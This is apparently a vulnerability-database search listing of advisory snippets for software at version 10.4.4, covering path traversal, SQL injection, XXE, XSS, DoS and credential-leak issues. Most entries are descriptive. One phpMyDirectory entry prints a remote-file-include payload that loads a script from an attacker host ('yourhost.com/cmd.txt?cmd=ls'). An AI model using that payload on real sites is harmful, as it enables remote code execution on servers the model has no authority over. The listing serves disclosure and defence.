EUVD-2025-203328

A flaw has been found in Smartbit CommV Smartschool App up to 10.4.4. Impacted is an unknown function of the component be.smartschool.mobile.SplashActivity. Executing manipulation can lead to path traversal. The attack requires local access. The exploit has been published and may be used. The...

Smartbit CommV Smartschool App 路径遍历漏洞

Smartbit CommV Smartschool App is a school management software from the Belgian company Smartbit CommV. A path traversal vulnerability exists in Smartbit CommV Smartschool App version 10.4.4 and earlier, which stems from a path traversal issue in the component be.smartschool.mobile.SplashActivity...

EUVD-2022-6055

Malicious code in bioql PyPI...

Tenable Nessus Agent < 10.4.4 DoS Vulnerability (TNS-2023-41)

Tenable Nessus Agent is prone to a denial of service DoS vulnerability. SPDX-FileCopyrightText: 2023 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

[R1] Nessus Agent Version 10.4.4 Fixes One Vulnerability

R1 Nessus Agent Version 10.4.4 Fixes One Vulnerability Arnie Cabral Thu, 11/16/2023 - 10:53 An arbitrary file write vulnerability exists where an authenticated attacker with privileges on the managing application could alter Nessus Rules variables to overwrite arbitrary files on the remote host,...

PT-2023-6874 · Comos · Comos

Name of the Vulnerable Software and Affected Versions: COMOS versions prior to V10.4.4 Description: The issue is related to the transmission of credentials in unencrypted form, potentially allowing a remote attacker to access configuration data. The caching system in the affected application leak...

Pimcore SQL注入漏洞

Pimcore is Austria Pimcore company's set of open source for creating and managing Web applications Web content management platform. The platform integrates Web content management, e-commerce framework and product information management applications. A SQL injection vulnerability exists in Pimcore...

GHSA-2RH4-XGMQ-63JP XXE vulnerability in Jenkins Parasoft Findings Plugin

Parasoft Findings Plugin implements a static analysis parser for various Parasoft products and integrates with Warnings Plugin 10.4.1 and earlier and Warnings NG Plugin 10.4.2 and newer. Parasoft Findings Plugin 10.4.3 and earlier does not configure its XML parser to prevent XML external entity X...

IceWarp Mail Server <= 10.4.4 XSS Vulnerability

IceWarp Mail Server is prone to a cross-site scripting XSS vulnerability. Copyright C 2017 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is fr...

IceWarp Mail Server Cross-Site Scripting Vulnerability (CNVD-2017-29528)

IceWarp Mail Server is a mail server product from IceWarp USA. The product supports email archiving, SmartAttach attachments, automatic migration and more. A cross-site scripting vulnerability exists in the administration panel of IceWarp Mail Server version 10.4.4. A remote attacker can exploit...

Plesk <= 10.4.4 / 11.x <= 1.0.9 XXE Injection Vulnerability - Active Check

Plesk is prone to an XML external entity XXE injection vulnerability. SPDX-FileCopyrightText: 2014 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

CVE-2011-4851

The CVE-2011-4851 entry concerns Parallels Plesk Panel 10.4.4_build20111103.18. The Control Panel generates a password form field without disabling autocomplete, enabling attackers to bypass authentication on unattended workstations, as demonstrated by forms in server/google-tools/ and other file...

[Full-disclosure] [MU-200606-02] Apple Open Directory Pre-Authentication Denial of Service

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Apple Open Directory Pre-Authentication Denial of Service MU-200606-02 June 27, 2006 http://labs.musecurity.com/advisories.html Affected Product/Versions: OSX 10.4.4 through 10.4.6 Product Overview:...

phpmydir1044.txt

ENGLISH Title : phpMyDirectory = 10.4.4 Multiple Remote File Include Vulnerabilities Dork : "powered by phpmydirectory" Author : ajann greetz : Nukedx,TheHacker Exploit; http://target/path/template/default/footer.php?ROOTPATH=http://yourhost.com/cmd.txt?cmd=ls...

phpMyDirectory <= 10.4.4 (ROOT_PATH) Remote Inclusion Vulnerability

Exploit for unknown platform in category web applications =================================================================== phpMyDirectory = 10.4.4 ROOTPATH Remote Inclusion Vulnerability =================================================================== Title : phpMyDirectory = 10.4.4 Remote...